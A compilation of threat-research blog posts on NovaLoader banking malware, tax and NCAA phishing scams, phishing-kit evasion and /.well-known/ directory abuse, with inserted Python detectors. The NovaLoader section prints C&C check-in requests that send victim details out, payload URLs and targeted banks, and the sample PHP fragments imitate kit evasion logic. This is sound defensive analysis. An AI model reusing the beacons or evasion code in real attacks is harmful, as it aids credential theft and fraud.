60772ad9808a5bab595f3459e8d5bb4c
9f4ff0d5425f1542fe4aef50cb1b20dd
64d5bba5e3a18f971ee5904ccc9b7826
20614d2d2471b2a7fcfbbf67f0fdbfb6
6f31a49153b6b504ce8804c91113852f
d717c2c4ebce47d40aea491e911b1c5d
3124ae1a165d2fd1f5ab4e6b83a1100a
4f3289108728c33866e62e99a1fed40d
1a027810c28fad34c7590ddb18dc6a51
4fd81f83d8cb40f6fb0bd1ad94b8ea7f
32131606ac4448683dad9148e4754f81
afe96ae477648b152e7434ac5c0790c6
793fc48a4947a3c19efc570ba8af1235
62ff00af19ad0ed02ab65f3d8a6ceb27
61d9506df0a016435297829bb386e4b8
61ded4d4c3268c354a794dc4c6dea530
81685083658d7e839e68489391f15a05
2bcc9865edb66883b82f43c34e6ac19d
a8a75b3055a9aa27a26d326061173287
8dbbcdfa3d4d1207e325890680f98d4a
58271be93858eb5baeaa401fe1d583bb
a350e8b88d586e26e9dc858c83407ebc
a5219ee0c3c10ca8db991d05fe34b9b0
ca17d9260a247e6457876a2f98e3fab7
064a46635c0bda86bcc42ae484ee5c25
874e3af735b6e17ddd596c29e2fc55d5
cfe0d20dbf674f8619584c850eda2186
0cadfdf04df0f3dba0e8a0fdb087993b
dada3ef23b89c9e0f535aa7dd49360e1
b34d3dbd6241f63670e010f7da05630b
43a70f5f1929e882894a023a67ffe23f
00b9c19f229892ad6f0c45f75a5bf729
154ee512e7142f56118209ec9375433d
4cd7745e9f0043ed3da046f88249b221
1efefb04a779b5cd7ccfc1aa4b104fc1
22b5cec87a9227abbaa6f120f4809230
0648e6c78d85ce62eed06fbb94283712
Categories: Security Posts
NovaLoader, yet another Brazilian banking malware family
As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and makes extensive use of the Visual Basic Script (VBS) scripting language. Although the final payload is not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique.
Delivery method
In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub, Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS.
NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones.
Fig.1: NovaLoader Infection flow
Main Dropper
MD5: 4ef89349a52f9fcf9a139736e236217e
The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script.
Fig. 2: Stage 1 VB script decryption loop
Stage 1 Script
Embedded script before and after decryption:
Fig. 3: VB script before and after decryption
This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption.
Fig. 4: Download request for the next stage, an encrypted payload
Stage 2 Script
Downloaded VB script looks like the following after decryption:
Fig. 5: VBS after decryption
The VB script sends a GET request to “http://54.95.36[.]242/contaw.php”, possibly to let the command-and-control (C&C) server know that it is running on the system. After that, it tries to detect the presence of a virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.
Fig. 6: VM detection code
NovaLoader copies the following executable files into the directory C:\Users\Public\:
C:\Windows\(system32|SysWOW64)\rundll32.exe
C:\Windows\(system32|SysWOW64)\Magnification.dll
Fig. 7: C&C notification request
After that, it downloads the following files from 32atendimentodwosgraumell[.]club:
32atendimentodwosgraumell[.]club/mi5a.php, decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip, saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip, saved at C:\Users\Public\{random}sq.zip
Then it will send multiple GET requests to “54.95.36.242/contaw{1-7}[.]php”
Fig. 8: Multiple C&C requests
GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_
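The check-in sequence above is a useful network detection handle: the C&C host is fixed and the path walks through contaw.php, contaw2.php, ..., contaw7.php while the w= parameter carries an underscore-separated victim profile. The following is an added example (not code from the post or from any Zscaler tooling) of a Python detector run over a constructed proxy log; the log format (timestamp, client IP, method, URL, status) and the hostname ABC-PC are assumptions, and the C&C address 54.95.36.242 is taken from the post's IOCs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample proxy log (not from the post): one benign request, four
# lines that mimic the contaw{N}.php check-ins described above, and one
# contaw.php hit on an unrelated internal host that must not be flagged.
SAMPLE_LOG = """\
2019-02-01T17:05:01Z 10.0.0.12 GET http://example.com/index.html 200
2019-02-01T17:05:06Z 10.0.0.12 GET http://54.95.36.242/contaw.php 200
2019-02-01T17:05:07Z 10.0.0.12 GET http://54.95.36.242/contaw2.php?w=ABC-PC_Microsoft%20Windows%207%20Professional%20_True 200
2019-02-01T17:05:08Z 10.0.0.12 GET http://54.95.36.242/contaw6.php?w=ABC-PC_2/1/2019%205:05:06%20PM 200
2019-02-01T17:05:09Z 10.0.0.12 GET http://54.95.36.242/contaw7.php?w=ABC-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ 200
2019-02-01T17:06:00Z 10.0.0.13 GET http://intranet.example.org/contaw.php 404
"""

# C&C host from the post's IOC section; extend from your own threat intel.
C2_HOSTS = {"54.95.36.242"}
# contaw.php is stage 1; contaw2.php ... contaw7.php are the later stages.
CONTAW_PATH = re.compile(r"^/contaw([1-7])?\.php$")


def parse_line(line):
    """Split one constructed log line into its five whitespace-separated fields."""
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url, "status": status}


def detect_novaloader_beacons(log_text):
    """Return one finding per request matching the NovaLoader check-in pattern.

    A hit requires both the C&C host and the contaw{N}.php path: the path alone
    is too generic to alert on, as the intranet line in the sample shows.
    """
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        parts = urlsplit(rec["url"])
        m = CONTAW_PATH.match(parts.path)
        if parts.hostname not in C2_HOSTS or not m:
            continue
        stage = int(m.group(1)) if m.group(1) else 1
        # The w= parameter carries an underscore-separated victim profile
        # (hostname, OS string, timestamp, disk sizes) in the requests shown.
        w = parse_qs(parts.query).get("w", [""])[0]
        fields = unquote(w).split("_") if w else []
        findings.append({
            "client": rec["client"],
            "stage": stage,
            "victim_host": fields[0] if fields else None,
            "fields": fields,
        })
    return findings


def summarize_by_client(findings):
    """Map client IP -> sorted list of stages seen, exposing the 1..7 sequence."""
    seen = {}
    for f in findings:
        seen.setdefault(f["client"], set()).add(f["stage"])
    return {client: sorted(stages) for client, stages in seen.items()}


if __name__ == "__main__":
    hits = detect_novaloader_beacons(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(summarize_by_client(hits))
```

A single contaw.php request is weak evidence on its own; alerting on the per-client stage sequence (several distinct stages from one client within a short window) is what separates this beaconing from a coincidental path match.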
It will also drop several files into the C:\Users\Public\ directory:
Dropped file     MD5                                Comment
DST.exe          51138BEEA3E2C21EC44D0932C71762A8   copied rundll32.exe
I                3DC26D510907EAAC8FDC853D5F378A83   encrypted file containing various values such as version, extension, etc.
I_               A34F1D7ED718934185EC96984E232784   encrypted configuration file
KC               89473D02FEB24CE5BDE8F7A559631351   similar to the file named "I"
mwg.dll          F3F571288CDE445881102E385BF3471F   copied magnification.dll
PFPQUN.DST       8C03B522ACB4DDC7F07AB391E79F1601   support DLL to decrypt the main payload
PFPQUN1.DST      F3D4520313D05C66CEBA8BDA748C0EA9   encrypted main payload
winx86.dll       87F9E5A6318AC1EC5EE05AA94A919D7A   SQLite DLL
Fig. 9: Files dropped by script
Finally, it executes the decrypted DLL's exported function using the copied rundll32.exe file.
Fig. 10: Executing the stage-3 payload
The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload.
Final payload
The final payload is written in Delphi. It has multiple capabilities, including stealing the victim's credentials for several Brazilian banks. It monitors browser window titles for bank names and, if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page while it carries out its fraudulent activity under instruction from its C&C. Its behaviour is quite similar to the well-known Overlay RAT.
Some of the interesting commands used by the malware include:
Command String
Description
To stabilize socket connection
Sends infected OS details
Checking status of the connection
Close all connections
Sends keystrokes to the active application window
Set mouse position
Set mouse left button down
Set mouse left button up
Set mouse right button up
Set mouse right button down
Share compromised system desktop
Check gets in C&C response to check if data is correct reply with
Fig. 11: NovaLoader C&C commands
There were many interesting strings related to the Brazilian banks found in malware:
Strings in malware            Corresponding bank site
caixa                         http://www.caixa.gov.br
bancodobrasil                 https://www.bancobrasil.com.br
bbcombr                       https://www.bb.com.br/
bradesco                      https://banco.bradesco/
santander                     https://www.santander.com.br/
bancodaamazonia               https://www.bancoamazonia.com.br/
brbbanknet                    https://brbbanknet.brb.com.br/netbanking/
banese                        https://www.banese.com.br/
banestes                      https://www.banestes.com.br/
bancodoestadodopar            https://www.banpara.b.br/
bancobs2                      https://www.bs2.com/
citibankbrasil                https://www.citibank.com.br
bancofibraonline              https://www.bancofibra.com.br/
agibank                       https://www.agibank.com.br/
bancoguanabara                http://www.bancoguanabara.com.br/
ccbbrasil                     http://www.br.ccb.com
bancoindusval                 https://www.bip.b.br/ir
internetbankingbancointer     https://internetbanking.bancointer.com.br/
modalbanking                  https://modalbanking.modal.com.br/
bancopan                      https://www.bancopan.com.br/
pineonline                    https://www.pine.com/
Fig. 12: Some of the targeted bank strings found in the malware
Conclusion
The Brazilian actors are among the top contributors of global cybercrime and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we have observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected.
IOCs
Md5
60e5f9fe1b778b4dc928f9d4067b470b
4ef89349a52f9fcf9a139736e236217e
100ff8b5eeed3fba85a1f64db319ff40
99471d4f03fb5ac5a409a79100cd9349
cb2ef5d8a227442d0156de82de526b30
a16273279d6fe8fa12f37c57345d42f7
ac4152492e9a2c4ed1ff359ee7e990d1
fdace867e070df4bf3bdb1ed0dbdb51c
4d5d1dfb84ef69f7c47c68e730ec1fb7
6bf65db5511b06749711235566a6b438
c5a573d622750973d90af054a09ab8dd
ef5f2fd7b0262a5aecc32e879890fb40
35803b81efc043691094534662e1351c
34340c9045d665b800fcdb8c265eebec
a71e09796fb9f8527afdfdd29c727787
5a9f779b9cb2b091c9c1eff32b1f9754
a7117788259030538601e8020035867e
cb9f95cec3debc96ddc1773f6c681d8c
a7722ea1ca64fcd7b7ae2d7c86f13013
URLs
185[.]141[.]195[.]5/prt1.txt
185[.]141[.]195[.]81/prt3.txt
185[.]141[.]195[.]74/prt1.txt
dwosgraumellsa[.]club/cabaco2.txt
wn5zweb[.]online/works1.txt
23[.]94[.]243[.]101/vdb1.txt
167[.]114[.]31[.]95/gdo1.txt
167[.]114[.]31[.]93/gdo1.txt
Categories: Security Posts
2019 tax season phishing scams
Tax time is here again and that means two things: writing big checks to Uncle Sam and, of course, a new season of tax scams brought to you by industrious and persistent malware authors.
Americans feeling the rising panic of ensuring that they are squared up with the federal government before April 15 are searching for help online and downloading the financial statements they need for filing. The bad actors are counting on it and, as you read this, there's a high probability that somewhere in your inbox is a link to a scam attempting to collect sensitive information from you. The IRS has been warning people about some of the tax scams this season using its annual “Dirty Dozen” compilation of phishing and online scams.
Of the following scenarios, which do you think is more likely? Will you be phished by a dodgy-looking IRS website, or will you get phished by a bogus financial website? Here at Zscaler, the ThreatLabZ research team has been monitoring such traffic and we've seen an increase in attempted generic phishing attacks posing as financial institutions. This trend makes sense because tax preparation usually means getting tax documents from several different financial institutions—your bank, your mortgage holder, your retirement and investment accounts, and so on. The following figure depicts financial and tax refund phishing events observed in the Zscaler cloud over the past two months.
Figure 1: Financial (gold) and tax refund (green) phishing events over the past two months
"IRS Login" phishing
Though the majority of phishing sites were for "generic" financial institutions, we did see IRS phishing websites, including the following, which asks the user to enter an email address and then redirects to a page to "verify" the account and fill in additional information, including a Social Security Number.
Figure 2: IRS Phishing – Login page
Figure 3: IRS Phishing – Personal and SSN details
Fake “Apply for EIN” scam and Google SEO poisoning
An EIN (Employer Identification Number) is a Federal Tax ID number required by businesses or other entities to file taxes. Eligible persons and entities can apply for an EIN on the IRS website and receive it immediately at no cost. Scammers have been active here too, attempting to extract personal information and money from unsuspecting users by advertising themselves as experts in filing for Tax IDs.
A Google search of “irs tax id” resulted in multiple scamming websites among the top ads.
Figure 4: Google search results for IRS Tax ID showing ads for scamming websites
We noticed a few of these sites, such as irs-tax-id[.]com, gov-irs-ein[.]co, and irs-ein-tax[.]com, using the same phishing template for their homepage, which you can see in the image below.
Figure 5: “Apply for EIN” phishing template used by multiple sites
Figure 6: Phishing page requesting personal information including SSN
Figure 7: Phishing page requesting credit card information
Here are a few of the domains that are active in luring users to apply for an Employer Identification Number (EIN).
Figure 8: “Apply for EIN” phishing domains
Tax refund phishing campaign – UK
The tax year in the UK has just ended (April 6), and scammers have been preparing to take advantage of users seeking their refunds. One of the phishing domains we have been monitoring, hmrc[.]co[.]uk[.]pendingrefund[.]tk, updated its phishing pages on April 6 to keep up with tax season events. It began with a refund claim form and was changed to a form for "processing" the claim and applying it to the user's credit card.
Phishing campaign observed before April 6:
Page 1: start.php requesting name and address
Page 2: claim_details.php displaying the information entered in start.php and fake amount
Page 3: details.php requesting detailed personal information and credit card details
Figure 9: Phishing pages observed before April 6, 2019
And the current page (Tax-Refund.php) served by the phishing website (starting April 6) can be seen in the below image:
Figure 10: Phishing page observed on April 6, 2019
Malware campaign
The IRS has warned about a “Tax Transcript” email scam used by attackers to distribute malicious documents containing malware. ThreatLabZ has also noticed tax-themed malicious documents delivering Emotet and Nymiam malware, which are well-known Trojans used for stealing data and credentials, among other malicious functions.
The following is the report of a recent Nymiam malware sample observed in the Zscaler Cloud Sandbox and delivered through a malicious URL: djaccounting[.]tax/wp-admin/98-14691361298-580222944834109973.zip
Figure 11: Cloud Sandbox Report for Nymiam malware sample: 7B80A64E9A106806EE4F62A16A968661
Conclusion
Every year during tax season, our researchers identify various kinds of phishing campaigns performing tax-related social engineering tactics in an attempt to collect sensitive information from unsuspecting users. You can read about some of the phishing campaigns that we observed during last year’s tax season here. The IRS has also been alerting tax filers about active tax scams and providing guidelines for safely filing taxes.
At ThreatLabZ, we have been actively monitoring the latest tax scam campaigns and providing protection for Zscaler customers.
Categories: Security Posts
The evolution of phishing kits
Gone are the days when a phishing page was a single page designed to capture user credentials. Phishing kits have become sophisticated and advanced to evade detection and look more legitimate to the user. In this blog, we will discuss some of the latest evasive and anti-analysis techniques used by these phishing kits.
Techniques to make phishing pages look more legitimate
1. Verification of payment card number before accepting
Many phishing campaigns related to banking, online shopping, or account upgrades ask victims to provide payment details to complete their online transactions. In such cases, most of the phishing campaigns simply check the length of the card number (debit or credit) provided by the victim and restrict them to 16 digits to prevent random details from being entered. In some cases, attackers go one step further, using online verification services to ensure that the victim enters the correct payment information.
The information about the institution that issued a particular card can be checked with the initial six or eight digits of the card number, which is called an Issuer Identification Number (IIN). Many online services provide APIs to check the IIN of a card. The screenshot below shows one such case.
Fig. 1: Request to check IIN information of the payment card number shown in the source code
2. Changing the language of phishing content based on victim’s geo-location
Most phishing campaigns are designed in one language, chosen for the probable victims of the attack. Such phishing pages only work in the particular region or country matching the language they are designed in. Like legitimate websites that are often "localized," a few phishing campaigns deliver phishing content in a language chosen according to the victim's geographical location, determined by looking up the victim's IP address, instead of using a single language.
Below is one such campaign which first checks the victim’s geo-location; all the main strings in the phishing page are variable with values that depend on geo-location.
Fig. 2: The main heading variable on the phishing page
Fig. 3: Values of the phishing page title, heading, and submit button based on geo-location
Evasion and anti-analysis techniques
1. One-time access to the phishing page
We have seen instances where phishing pages are accessible only once; upon re-visiting the page, it redirects the user to other websites. Below is one such campaign.
Fig. 4: The victim's IP address is logged after checking if it is the first visit
Fig. 5: File onetime.dat store log of all victims’ IP addresses
Fig. 6: A victim's IP address is checked against the IP address in the file onetime.dat
When a client visits a phishing page such as the one discussed above, the client's IP address is logged in a file on the first visit. On each subsequent visit, the client's IP address is checked against the list of IPs that previously visited. Based on the result of that check, the client is either granted access to the phishing page, shown a "Page not found" message, or redirected to another website.
2. Proxy check using online services
Recently, many phishing kits have included a hardcoded list of blacklisted IP addresses, user-agents, and hostnames known to be used by security researchers and security companies. If the client attempts to connect with a blacklisted IP or user-agent, the phishing content will not be served. In some cases, along with the list of hardcoded IP addresses, the client’s IP is checked using some online services to see whether or not it is a proxy.
Fig. 7: Source code using an online service to check the client's IP address for a proxy
Fig. 8: Phishing page for the above-discussed campaign
3. Creating a new random name directory on each visit
To make phishing campaigns more difficult to detect, some campaigns create a new randomly named directory on each visit and host the phishing page in that directory. Below is the analysis of one such campaign.
Fig. 9: Random name directory is shown on a phishing page
Fig. 10: Newly created random name directory in a web server
Fig. 11: Source code to generate a random name directory on each visit
4. Creating a new random name file on each visit
A few phishing kits were found to be creating a new random name file on each visit to make it difficult to identify as a phishing site. Below is the analysis of one such phishing kit.
Fig. 12: Random name file in URL is shown on a phishing page
Fig. 13: Source code to generate a random name file on each visit
5. Random values for HTML attributes on each visit
To make a phishing page hard to analyze and detect, the page values of HTML attributes are generated randomly upon each visit, as shown in the phishing campaign depicted below.
Fig. 14: Randomly created values for HTML attributes
Fig. 15: Source code to generate random values for HTML attributes
Fig. 16: Phishing page related to the above-discussed campaign
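The five evasion techniques above (one-time access with an IP log, user-agent/proxy gating, randomly named directories and files, and randomised HTML attributes) all leave characteristic patterns in a kit's server-side source, which is what an analyst gets when a kit archive is recovered from a compromised host. The following is an added example, not code from the post or from any real kit: a Python static triage scanner run over constructed PHP fragments that imitate each technique. The fragments, the file names, and the proxycheck.example service name are all assumptions made for the demonstration.

```python
import re

# Constructed PHP fragments that imitate the evasion techniques described above.
# They are not code from the post or from any real kit; they only give the
# scanner something to match.
SAMPLE_KIT = {
    "onetime.php": '''<?php
$ip = $_SERVER["REMOTE_ADDR"];
$seen = file("onetime.dat", FILE_IGNORE_NEW_LINES);
if (in_array($ip, $seen)) { header("Location: https://example.com/"); exit; }
file_put_contents("onetime.dat", $ip . "\\n", FILE_APPEND);
''',
    "blocker.php": '''<?php
$bad_agents = array("googlebot", "curl", "python-requests", "phantomjs");
foreach ($bad_agents as $ua) {
  if (stripos($_SERVER["HTTP_USER_AGENT"], $ua) !== false) { header("HTTP/1.1 404 Not Found"); exit; }
}
''',
    "proxycheck.php": '''<?php
$r = file_get_contents("https://proxycheck.example/api?ip=" . $_SERVER["REMOTE_ADDR"]);
if (strpos($r, "yes") !== false) { exit; }
''',
    "randdir.php": '''<?php
$dir = substr(md5(uniqid(rand(), true)), 0, 12);
mkdir($dir);
copy("login.html", $dir . "/index.html");
header("Location: " . $dir . "/");
''',
    "form.php": '''<?php
$n = "f" . mt_rand(1000, 9999);
echo "<input type=text name=\\"$n\\">";
''',
    "login.php": '''<?php
echo "<form method=post><input type=text name=username><input type=password name=password></form>";
''',
}

# (indicator name, regex). The lazy [\s\S]{0,N}? windows let a match span line
# breaks but force the two related calls to sit close together, which keeps
# the patterns from firing on any PHP file that merely mentions REMOTE_ADDR.
INDICATORS = [
    ("one_time_ip_log",
     re.compile(r"REMOTE_ADDR[\s\S]{0,300}?(FILE_APPEND|fwrite\s*\(|file_put_contents\s*\()")),
    ("ua_blocklist",
     re.compile(r"HTTP_USER_AGENT[\s\S]{0,200}?(404|Location:)")),
    ("proxy_check",
     re.compile(r"(curl_init|file_get_contents)\s*\([^;]*REMOTE_ADDR")),
    ("random_path",
     re.compile(r"(uniqid|mt_rand|rand|random_bytes)\s*\([\s\S]{0,200}?(mkdir|copy|rename)\s*\(")),
    ("random_html_attributes",
     re.compile(r"(uniqid|mt_rand|rand)\s*\([\s\S]{0,160}?(name|id)=")),
]


def scan_file(text):
    """Return the names of all indicators found in one source file."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_kit(files):
    """Map each file name in a kit to the evasion indicators found in it."""
    return {name: scan_file(text) for name, text in files.items()}


def kit_score(report):
    """Count distinct indicators across the kit; two or more is a strong sign
    of an evasive kit rather than a plain credential-harvesting form."""
    return len({ind for inds in report.values() for ind in inds})


if __name__ == "__main__":
    rep = scan_kit(SAMPLE_KIT)
    for fname, inds in rep.items():
        print(f"{fname:15} {inds}")
    print("score:", kit_score(rep))
```

Real kits vary in coding style, so treat these regexes as starting points for a triage pass rather than a detection signature; the point is that the evasion logic itself, not the phishing template, is the most stable thing to hunt for across kit variants.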
Conclusion
Phishing attacks have been on the rise for a few years, but we’re seeing changes in attackers’ methodologies. As end-users become more careful about clicking suspicious links or opening unknown attachments, attackers have also upped the ante by evolving the way in which the phishing content is delivered, and they’re leveraging new tactics to make the phishing pages remain undetected for longer periods.
Zscaler ThreatLabZ actively tracks new and evolving phishing campaigns and protects customers from these types of attacks.
Categories: Security Posts
2019 NCAA Madness - Phishing and Streaming Scams
Last week, 64 of the best men's college basketball teams (68 if you count the First Four games) began their quest to cut down the nets in Minneapolis on April 8. Since the opening day of the NCAA men's college basketball tournament isn’t a national holiday, most fans were likely at work when the tournament tipped off. But, that shouldn’t stop them from seeing their alma mater try to upset a national powerhouse or watching a No. 12 seed knock off a No. 5 seed. Thankfully, fans can stream the whole tournament through the CBS Sports website.
Zscaler ThreatLabZ noticed increased activity on sports and media sites during the games on the Zscaler cloud platform. However, IT managers or productivity hounds need not panic and pull the curtain on this viewing activity. There are very good reasons to consider allowing your diligent and fanatic workers a chance to cheer for their team (or just to earn some side hustle in the office bracket challenge pool). The most important reason is that blocking official streams sends users elsewhere to watch unofficial streams. These unofficial streams can lead to very real security incidents if left unchecked.
Figure 1: Sports streaming media during NCAA Tournament for the past 10 days.
Figure 1 shows just a portion of the traffic observed by the Zscaler cloud that is generated by streaming services during the tournament. A steady flow can be seen as far as transaction count goes, but the highlight is the total volume of bytes, which peaks at 12.35 TB per hour at one point. There is so much interest in the first round of the NCAA tournament that it is better to just allow streaming from legitimate sites if your internal infrastructure can support the load. Figure 2 shows the top official streaming sites that were visited across the Zscaler cloud in the past week for NCAA games. Blocking this activity might lead a portion of the viewership to look for alternative sites with less-respectable online reputations.
Figure 2: Top sites accessed for NCAA Tournament streaming.
To see just how bad it can get out there, the ThreatLabZ team did an analysis of some attacks seen while searching for unofficial NCAA streams. What we found was a series of adware installers, phishing attacks and fraudulent security warnings leading to malicious browser plugins.
Searching for "ncaa live stream free" in Google resulted in multiple phishing links in the top 50 results.
Figure 3: An adware/phishing link in the top 50 Google search results.
Adware/phishing scams
One of the malicious streaming sites that we came across, streamcartel[.]org, is laced with adware on almost every one of its pages. When the visitor clicks anywhere on the page or attempts to close the ad, a new tab opens up, prompting the user to install a fake browser extension.
Figure 4: Streamcartel[.]org's NBA schedule page displaying a fake plugin ad.
According to information from Whois, sawlive[.]tv was registered one year ago during the NCAA tournament. It also uses other sporting events for enticing users to visit the site. One of the malicious ads from the site redirects to a Windows fake security warning page.
Figure 5: Fake security warning ad/page from Microsoft Windows Firewall.
The goal of this adware site or of any other is to make money by delivering unwanted ads to the user. In addition to that, this site also has a PayPal donation link asking visitors to donate money.
Figure 6: PayPal donation page for owls0071@hotmail.com (in Dutch).
Behind the scenes
The site embeds a player and content from sawlive[.]tv, which delivers more adware. These sites serve JavaScript obfuscated using JSF*ck, an encoding that uses only six characters to express any JavaScript. Here, 5,518 characters were sent as part of a response and, when deobfuscated, resulted in only 10 characters (“sawlive[.]tv”).
Figure 7: JavaScript obfuscated using JSF*ck, served by sawlive[.]tv.
This obfuscated JavaScript redirects to a request where the malicious server responds with more obfuscated JavaScript.
Figure 8: Another cycle of obfuscated JavaScript served by the malicious site.
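The 5,518-to-10 expansion above is the tell: a JSF*ck blob is long and made of nothing but `[]()!+`, which no hand-written script looks like. The following is an added example (not code from the post) of a Python heuristic that flags such blobs from static inspection without evaluating them. The JSF*ck sample is constructed for the example: each term indexes one character out of the string "false" (`![]+[]`), so the whole expression evaluates to "false" in a browser; the length and ratio thresholds are assumptions to tune against your own traffic.

```python
import re

# The six characters JSF*ck uses. Everything else (whitespace aside) is a sign
# that the script is something other than a pure JSF*ck blob.
JSFUCK_ALPHABET = frozenset("[]()!+")

# Constructed JSF*ck sample (not the sawlive script from the post). Each term
# indexes a character out of "false" ( ![]+[] ), so the whole expression
# evaluates to the string "false".
JSFUCK_SAMPLE = "+".join([
    "(![]+[])[+[]]",                  # "f"  (index 0)
    "(![]+[])[+!+[]]",                # "a"  (index 1)
    "(![]+[])[!+[]+!+[]]",            # "l"  (index 2)
    "(![]+[])[!+[]+!+[]+!+[]]",       # "s"  (index 3)
    "(![]+[])[!+[]+!+[]+!+[]+!+[]]",  # "e"  (index 4)
])

# Constructed benign snippets for comparison.
BENIGN_SAMPLE = 'function show(){document.getElementById("x").innerText="hi";}'
SHORT_IIFE = "(function(){})()"   # bracket-heavy but far too short to matter


def jsfuck_stats(script):
    """Return (alphabet_ratio, length) for the script with whitespace removed."""
    body = re.sub(r"\s+", "", script)
    if not body:
        return 0.0, 0
    hits = sum(1 for ch in body if ch in JSFUCK_ALPHABET)
    return hits / len(body), len(body)


def looks_like_jsfuck(script, min_len=64, min_ratio=0.98):
    """Flag scripts long enough to carry a payload that consist (almost)
    entirely of the six JSF*ck characters.

    min_ratio below 1.0 tolerates a thin wrapper such as a trailing semicolon
    or an eval( ... ) call around the blob; min_len keeps ordinary short IIFEs
    and empty scripts from triggering.
    """
    ratio, length = jsfuck_stats(script)
    return length >= min_len and ratio >= min_ratio


if __name__ == "__main__":
    for label, s in (("jsfuck", JSFUCK_SAMPLE), ("benign", BENIGN_SAMPLE), ("iife", SHORT_IIFE)):
        print(label, jsfuck_stats(s), looks_like_jsfuck(s))
```

Because the check is purely lexical it is safe to run on captured responses at the proxy; the blob is never executed, which is the right posture for content whose only purpose is to hide a redirect.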
Whenever the user attempts to click or close the ad, a new browser tab is opened with a request to http[:]//www[.]adexchangecloud[.]com/jump/next[.]php?r=44011, which prompts the user to install a fake browser plugin, shows scareware alerts, or serves additional adware. One of the ads redirects to a fake “Adobe Flash Player” update, as shown below:
Figure 8: Fake “Adobe Flash Player” update ad.
The download/installer is flagged as malicious by our Zscaler Cloud Sandbox and also by VirusTotal.
Figure 9: Zscaler Cloud Sandbox report for “Fake Flash Player”.
Typo-squatted domains
As part of every phishing/scam campaign that abuses current trends/keywords, there are typo-squatted domains for terms associated with the NCAA tournament. Here are a few domains that have been registered in the past 10 days:
marchmadnessresults[.]com
watchmarchmadnesslive[.]com
betmarchmadness[.]fan
marchmadness[.]mba
marchmadness[.]rocks
Conclusion
The NCAA tournament is a massive draw for users around the nation. Taking a measured approach to how it is handled is critical for all businesses. The examples laid out should highlight the diversity of threats that attempt to exploit the excitement around the NCAA tournament. We encourage readers to exercise caution when doing searches or clicking on links related to streaming the tournament. Zscaler ThreatLabZ continuously monitors online activity worldwide to ensure that Zscaler customers are protected from threats, even if they become tricked into clicking a nefarious link.
IoCs
adexchangecloud[.]com
adexchangemachine[.]com
go[.]onclasrv[.]com
gsafe[.]getawesome1[.]com
inter1ads[.]com
onclickmega[.]com
sawlive[.]tv
tgun[.]tv
urldelivery[.]com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Chris Mannon and Krishna Kona are Sr. Security Researchers at Zscaler.
Categories: Security Posts
Abuse of hidden “well-known” directory in HTTPS sites
WordPress and Joomla are among the most popular Content Management Systems (CMSs). They have also become popular targets for malicious actors, as cybercriminals compromise sites on these platforms to inject malicious content. During the past few weeks, ThreatLabZ researchers have detected several WordPress and Joomla sites that were serving Shade/Troldesh ransomware, backdoors, redirectors, and a variety of phishing pages. The most common threats to CMS sites result from vulnerabilities introduced by plugins, themes, and extensions.
In this blog, we are focusing on the Shade/Troldesh ransomware and phishing pages that we detected last month from several hundred compromised CMS sites. Shade ransomware has been quite active in the wild and we have been seeing a number of compromised WordPress and Joomla sites being used to spread the ransomware.
The compromised WordPress sites we have seen are using versions 4.8.9 to 5.1.1 and they use SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert, among others. These compromised WordPress sites may have outdated CMS plugins/themes or server-side software which potentially could also be the reason for the compromise.
Fig 1: Hits of Shade and phishing in detected CMS sites
During the past month, our cloud blocked transactions to compromised WordPress and Joomla sites due to Shade ransomware payloads (13.6 percent) and phishing pages (27.6 percent), with the remaining blocks due to coinminers, adware, and malicious redirectors.
We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on the HTTPS website for storing and distributing Shade ransomware and phishing pages.
The hidden /.well-known/ directory in a website is a URI prefix for well-known locations defined by IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain. The CA will send them specific code for an HTML page that must be located in this particular directory. The CA will then scan for this code to validate the domain. The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site.
The different types of threats that we found under the hidden directory in the past month are shown in the below image.
Fig 2: Threats in hidden directory
Fig 3: Shade ransomware vs. phishing pages in the hidden directory
